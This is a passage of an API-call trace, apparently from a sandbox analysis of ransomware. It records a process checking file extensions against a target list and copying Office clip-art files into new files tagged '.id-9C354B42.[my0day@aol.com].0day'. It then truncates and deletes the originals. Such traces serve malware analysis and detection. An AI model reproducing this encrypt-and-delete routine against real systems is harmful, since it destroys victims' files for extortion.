(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.619] lstrlenW (lpString=".zip") returned 4 [0270.619] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.619] lstrlenW (lpString=".rar") returned 4 [0270.619] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString=".bz2") returned 4 [0270.620] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString=".7z") returned 3 [0270.620] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString=".dbf") returned 4 [0270.620] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString=".1cd") returned 4 [0270.620] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString=".jpg") returned 4 [0270.620] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString=".doc") returned 4 [0270.620] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString=".docx") returned 5 [0270.620] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.620] lstrlenW (lpString=".pdf") returned 4 [0270.620] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString=".xls") returned 4 [0270.620] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.620] lstrlenW (lpString=".xlsx") returned 5 [0270.620] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.620] lstrlenW (lpString=".ppt") returned 4 [0270.620] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.620] lstrlenW (lpString=".zip") returned 4 [0270.621] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.621] lstrlenW (lpString=".rar") returned 4 [0270.621] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.621] lstrlenW (lpString=".bz2") returned 4 [0270.621] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.621] lstrlenW (lpString=".7z") returned 3 [0270.621] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.621] lstrlenW (lpString=".dbf") returned 4 [0270.621] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.621] lstrlenW (lpString=".1cd") returned 4 [0270.621] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 63 [0270.621] lstrlenW (lpString=".jpg") returned 4 [0270.621] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.621] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.621] lstrlenW (lpString="BS00078_.WMF") returned 12 [0270.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.622] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=1444) returned 1 [0270.622] CloseHandle (hObject=0x38c) returned 1 [0270.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 0x20 [0270.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.623] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.623] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.623] GetLastError () returned 0x0 [0270.623] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x5a4, lpOverlapped=0x0) returned 1 [0270.625] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0270.626] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.626] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.626] SetEndOfFile (hFile=0x2c4) returned 1 [0270.626] CloseHandle (hObject=0x2c4) returned 1 [0270.626] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.627] SetEndOfFile (hFile=0x38c) returned 1 [0270.629] CloseHandle (hObject=0x38c) returned 1 [0270.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0270.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.630] lstrlenW (lpString=".doc") returned 4 [0270.630] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString=".docx") returned 5 [0270.630] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.630] lstrlenW (lpString=".pdf") returned 4 [0270.630] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString=".xls") returned 4 [0270.630] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.630] lstrlenW (lpString=".xlsx") returned 5 [0270.630] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.630] lstrlenW (lpString=".ppt") returned 4 [0270.630] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.630] lstrlenW (lpString=".zip") returned 4 [0270.630] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.630] lstrlenW (lpString=".rar") returned 4 [0270.630] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString=".bz2") returned 4 [0270.630] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString=".7z") returned 3 [0270.630] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.630] lstrlenW (lpString=".dbf") returned 4 [0270.630] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.631] lstrlenW (lpString=".1cd") returned 4 [0270.631] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.631] lstrlenW (lpString=".jpg") returned 4 [0270.631] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.631] lstrlenW (lpString=".doc") returned 4 [0270.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString=".docx") returned 5 [0270.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.631] lstrlenW (lpString=".pdf") returned 4 [0270.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString=".xls") returned 4 [0270.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.631] lstrlenW (lpString=".xlsx") returned 5 [0270.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.631] lstrlenW (lpString=".ppt") returned 4 [0270.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.631] lstrlenW (lpString=".zip") returned 4 [0270.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.631] lstrlenW (lpString=".rar") returned 4 [0270.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.631] lstrlenW (lpString=".bz2") returned 4 [0270.631] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.632] lstrlenW (lpString=".7z") returned 3 [0270.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.632] lstrlenW (lpString=".dbf") returned 4 [0270.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.632] lstrlenW (lpString=".1cd") returned 4 [0270.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 63 [0270.632] lstrlenW (lpString=".jpg") returned 4 [0270.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.632] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.632] lstrlenW (lpString="BS00092_.WMF") returned 12 [0270.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.632] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=7974) returned 1 [0270.632] CloseHandle (hObject=0x38c) returned 1 [0270.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 0x20 [0270.632] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.633] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.633] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0270.633] GetLastError () returned 0x0 [0270.633] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x1f26, lpOverlapped=0x0) returned 1 [0271.047] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0271.049] ReadFile (in: hFile=0x38c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.049] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.049] SetEndOfFile (hFile=0x2c4) returned 1 [0271.057] CloseHandle (hObject=0x2c4) returned 1 [0271.057] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.057] SetEndOfFile (hFile=0x38c) returned 1 [0271.059] CloseHandle (hObject=0x38c) returned 1 [0271.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.084] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0271.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.084] lstrlenW (lpString=".doc") returned 4 [0271.085] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".docx") returned 5 [0271.085] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.085] lstrlenW (lpString=".pdf") returned 4 [0271.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".xls") returned 4 [0271.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.085] lstrlenW (lpString=".xlsx") returned 5 [0271.085] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.085] lstrlenW (lpString=".ppt") returned 4 [0271.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.085] lstrlenW (lpString=".zip") returned 4 [0271.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.085] lstrlenW (lpString=".rar") returned 4 [0271.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".bz2") returned 4 [0271.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.085] lstrlenW (lpString=".7z") returned 3 [0271.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString=".dbf") returned 4 [0271.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString=".1cd") returned 4 [0271.086] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString=".jpg") returned 4 [0271.086] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString=".doc") returned 4 [0271.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".docx") returned 5 [0271.086] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.086] lstrlenW (lpString=".pdf") returned 4 [0271.086] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".xls") returned 4 [0271.086] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.086] lstrlenW (lpString=".xlsx") returned 5 [0271.086] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.086] lstrlenW (lpString=".ppt") returned 4 [0271.086] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.086] lstrlenW (lpString=".zip") returned 4 [0271.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.086] lstrlenW (lpString=".rar") returned 4 [0271.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".bz2") returned 4 [0271.086] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.086] lstrlenW (lpString=".7z") returned 3 [0271.086] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.087] lstrlenW (lpString=".dbf") returned 4 [0271.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.087] lstrlenW (lpString=".1cd") returned 4 [0271.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 63 [0271.087] lstrlenW (lpString=".jpg") returned 4 [0271.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.087] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.087] lstrlenW (lpString="BS00200_.WMF") returned 12 [0271.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.087] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=3104) returned 1 [0271.087] CloseHandle (hObject=0x388) returned 1 [0271.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 0x20 [0271.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.088] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.088] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.088] GetLastError () returned 0x0 [0271.088] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xc20, lpOverlapped=0x0) returned 1 [0271.091] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xc30, lpOverlapped=0x0) returned 1 [0271.092] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.092] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.092] SetEndOfFile (hFile=0x38c) returned 1 [0271.092] CloseHandle (hObject=0x38c) returned 1 [0271.092] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.092] SetEndOfFile (hFile=0x388) returned 1 [0271.094] CloseHandle (hObject=0x388) returned 1 [0271.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf")) returned 1 [0271.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.095] lstrlenW (lpString=".doc") returned 4 [0271.095] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.095] lstrlenW (lpString=".docx") returned 5 [0271.095] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.095] lstrlenW (lpString=".pdf") returned 4 [0271.095] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.095] lstrlenW (lpString=".xls") returned 4 [0271.095] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.095] lstrlenW (lpString=".xlsx") returned 5 [0271.095] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.095] lstrlenW (lpString=".ppt") returned 4 [0271.095] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.095] lstrlenW (lpString=".zip") returned 4 [0271.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.095] lstrlenW (lpString=".rar") returned 4 [0271.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".bz2") returned 4 [0271.096] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".7z") returned 3 [0271.096] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString=".dbf") returned 4 [0271.096] lstrcmpiW 